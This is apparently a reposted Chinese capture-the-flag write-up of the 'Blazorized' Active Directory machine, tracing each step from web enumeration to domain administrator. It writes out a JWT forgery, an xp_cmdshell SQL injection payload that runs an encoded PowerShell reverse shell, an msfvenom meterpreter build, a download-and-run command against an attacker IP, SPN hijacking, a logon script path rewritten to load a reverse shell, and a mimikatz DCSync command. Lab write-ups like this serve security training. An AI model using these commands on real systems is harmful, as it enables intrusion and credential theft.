域渗透-Blazorized

admin 2024年8月28日15:56:50评论55 views字数 1849阅读6分9秒阅读模式

信息收集:

域渗透-Blazorized

暴露的服务汇总:

DNS 服务 (53/tcp)HTTP 服务 (80/tcp)Kerberos (88/tcp)RPC 与 NetBIOS (135/tcp, 139/tcp, 445/tcp)LDAP 和 Active Directory (389/tcp, 3268/tcp)MS-SQL (1433/tcp)未指定服务 (464/tcp, 593/tcp, 636/tcp, 3269/tcp)

由Kerberos和LDAP服务可推断出该机器是一台域控。

先看Web:

域渗透-Blazorized

fuzz出admin子域(-fc 过滤返回状态码):

域渗透-Blazorized

打开时管理员登录页面:

域渗透-Blazorized

寻找凭据:

有个检查更新页面,可以模拟管理员身份调用api获取帖子和类别的更新:

域渗透-Blazorized

抓包看看,发现有管理员的JWT:

域渗透-Blazorized

域渗透-Blazorized

但是不知道签名。继续观察流量,在Blazor应用程序的启动配置文件接口中发现了代码库资源列表:

域渗透-Blazorized

把与Blazor应用相关的下面四个dll下载下来分析:

Blazored.LocalStorage.dllBlazorized.DigitalGarden.dllBlazorized.Shared.dllBlazorized.Helpers.dll

得到JWT签名:

域渗透-Blazorized

拿到签名后随即伪造管理员的JWT Token,过期时间可设置长点:

域渗透-Blazorized

修改下admin登录页面的 Local Storage:

域渗透-Blazorized

进后台说明:后台功能不调用Api,直接与数据库通信:

域渗透-Blazorized

靶机这种提示大概率是SQL注入了,找输入点发现搜索页面输入特殊字符没页面回显:

域渗透-Blazorized

制作 xp_cmdshell 反弹shell:

域渗透-Blazorized

搜索框输入payload:

'; EXEC master.dbo.xp_cmdshell 'powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand [base64-payload]' --+#

弹回shell,也拿到了user flag:

域渗透-Blazorized

域渗透-Blazorized

换成msfvenom的马子:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.32 LPORT=9999 -f exe -o rev-9999.exe

msf建立监听后,在靶机下载马子执行:

Invoke-WebRequest -Uri 'http://10.10.14.32:8088/rev-9999.exe' -OutFile 'C:UsersPublicrev-9999.exe'; Start-Process 'C:UsersPublicrev-9999.exe'

上传SharpHound收集域内信息:

Invoke-WebRequest -Uri http://10.10.14.32:8088/SharpHound.exe -OutFile C:UsersPublicSharpHound.exe.SharpHound.exe -c All

我获取的 NU_1055 用户对RSA_4810用户具有WriteSPN权限,这里可进行SPN劫持

域渗透-Blazorized

通过修改 RSA_4810 的SPN,然后窃取该SPN的Kerberos服务票据:

域渗透-Blazorized

使用john爆破密码,建议使用 --fork 启动多线程:

域渗透-Blazorized

使用evil-winrm登录后,导入PowerView.ps1,搜索访问控制列表:

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}

域渗透-Blazorized

查看 SSA_6010 的域属性,发现可以修改SSA_6010的脚本路径,重写路径为加载反弹shell:

Get-ADUser -Identity SSA_6010 -Properties *Set-ADUser -Identity SSA_6010 -ScriptPath "A32FF3AEAA23revshell.bat"

域渗透-Blazorized

同时观察 bloodhound 发现 SSA_6010 用户可以对管理员用户进行 DCSync 攻击(通过模拟域控制器从 Active Directory 中提取密码数据):

域渗透-Blazorized

弹过来SSA_6010的shell之后获取其NTML哈希,使用evil-winrm登录后上传mimikatz获取administrator的NTLM哈希:

./mimikatz.exe -Command '"lsadump::dcsync /user:administrator"' exit

域渗透-Blazorized

使用管理员身份登录,结束。

原文始发于微信公众号(KeepHack1ng):域渗透-Blazorized

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月28日15:56:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   域渗透-Blazorizedhttps://cn-sec.com/archives/3104457.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息